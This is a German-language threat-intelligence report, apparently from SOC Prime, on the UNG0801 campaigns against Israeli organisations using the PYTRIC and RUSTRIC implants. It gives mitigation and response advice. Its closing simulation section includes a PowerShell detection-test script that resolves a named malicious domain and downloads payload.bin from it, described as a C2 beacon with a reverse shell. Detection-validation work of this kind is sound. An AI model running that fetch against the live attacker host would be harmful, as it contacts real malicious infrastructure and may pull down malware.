SOC Prime Bias: Kritisch

30 Dec 2025 13:40 UTC

UNG0801: Israel-gezielte Bedrohungsaktivität durch AV-Icon-Spoofing

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
UNG0801: Israel-gezielte Bedrohungsaktivität durch AV-Icon-Spoofing
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Der Bericht skizziert zwei verbundene Kampagnen, die bösartige PDF- und Word-Dokumente nutzen, um Payloads bereitzustellen, die Antivirus-Symbole imitieren und auf israelische Organisationen abzielen. Eine Spur platziert PYTRIC, ein PyInstaller-verpacktes Python-Implantat, während die andere RUSTRIC bereitstellt, ein auf Rust basierendes Implantat, das über ein makrofähiges Word-Dokument gestartet wird. Beide Payloads sammeln Host-Details, führen Systembefehle aus und untersuchen installierte Sicherheitssoftware; PYTRIC enthält zusätzlich destruktive Funktionen. Die Zustellung erfolgt über Spear-Phishing-Anhänge und cloudbasierte Links (einschließlich Dropbox), wobei Telegram für die Steuerung und Kontrolle verwendet wird.

Untersuchung

SEQRITE Labs analysierte die anfänglichen Phishing-Köder, extrahierte eingebettete Makros und rekonstruierte die ausgelöste Payload-Kette. PYTRIC wurde als PyInstaller-Bundle mit Routinen zur Dateierkennung und Löschung bestätigt, und Analysten beobachteten Telegram-Bot-Anmeldedaten, die mit Backup2040 in Verbindung stehen. RUSTRIC wurde als Rust-Binärdatei profiliert, die nach achtundzwanzig Antivirusprodukten sucht und eine hex-kodierte Payload über WMI auslöst. Eine Infrastruktur-Analyse verband die Zustellung mit einem Dropbox-Link und einer Domain, die zu einer bereits mit netvigil.org.

Minderung

Schulen Sie Benutzer, unaufgefordert zugesandte PDF- und Word-Anhänge mit Vorsicht zu behandeln—insbesondere Dateien, die als Sicherheitstools oder mit Antiviren-Utilities präsentiert werden. Konfigurieren Sie E-Mail-Sicherheit so, dass Dokumente mit Makros blockiert werden und URLs, die auf Cloudspeicher-Hosts für die Payload-Zustellung verweisen, markiert oder eingeschränkt werden. Auf Endpunkten überwachen Sie die Ausführung von PyInstaller, ungewöhnliche WMI-Prozesserstellungen und verdächtige Aufrufe integrierter Dienstprogramme wie whoami, hostname und nslookup. Die Blockierung identifizierter bösartiger Domains und IPs kann den Infektionspfad weiter beeinträchtigen.

Reaktion

Wenn Aktivität erkannt wird, isolieren Sie das betroffene System, bewahren Sie flüchtige Daten auf und sammeln Sie die bösartigen Dokumente für eine hashbasierte Triage. Stoppen Sie verdächtige durch WMI gestartete Prozesse und entfernen Sie ausgelöste Payloads aus üblichen Speicherorten wie dem Downloads-Ordner. Führen Sie eine forensische Validierung auf Datei-Lösch- oder Wischaktivitäten durch, setzen Sie möglicherweise kompromittierte Anmeldedaten zurück und überwachen Sie nachfolgende Telegram-C2-Kommunikationen.

Angriffsablauf

Simulationsausführung

Voraussetzung: Die Telemetrie- und Basislinien-Abflugkontrolle muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und sollen genau die Telemetriedaten erzeugen, die von der Erkennung erwartet werden. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle:
    Der Gegner hat die Domain vorregistriert stratioai.org und sie so konfiguriert, dass sie auf 159.198.68.25 (ein kompromittierter VPS) auflöst. Mit einem PowerShell-One-Liner initiieren sie ein C2-Signal, das eine kleine Payload herunterlädt und dann eine persistente Rückwärtsshell beibehält. Die ausgehende Verbindung erfolgt über HTTPS (Port 443), um sich mit normalem Datenverkehr zu vermischen, aber die Firewall protokolliert die Ziel-IP und die DNS-Abfrage, was die Sigma-Regel erfüllt.

  • Regressionstest-Skript:

    # -------------------------------------------------
    # Simuliertes C2-Signal zur Validierung der Erkennung
    # -------------------------------------------------
    # 1. Löse die bösartige Domain (erzwingt DNS-Abfrage)
    $maliciousDomain = "stratioai.org"
    $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain)
    Write-Host "Aufgelöst $maliciousDomain zu $($resolved -join ', ')"
    
    # 2. Stelle HTTPS-Verbindung zur bösartigen IP her (C2)
    $maliciousIP = "159.198.68.25"
    $url = "https://$maliciousDomain/payload.bin"
    
    try {
        $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10
        Write-Host "C2-Anfrage erfolgreich, Größe: $($response.ContentLength) Bytes"
    } catch {
        Write-Error "C2-Anfrage fehlgeschlagen: $_"
    }
    
    # 3. OPTIONAL: Halte den Kanal 30 Sekunden lang offen
    Start-Sleep -Seconds 30
    # -------------------------------------------------
  • Aufräum-Befehle:

    # Entferne alle temporären Dateien (in diesem Skript keine erstellt)
    # Leere den DNS-Cache, um eine versehentliche Wiederverwendung zu vermeiden
    ipconfig /flushdns
    Write-Host "Bereinigung abgeschlossen."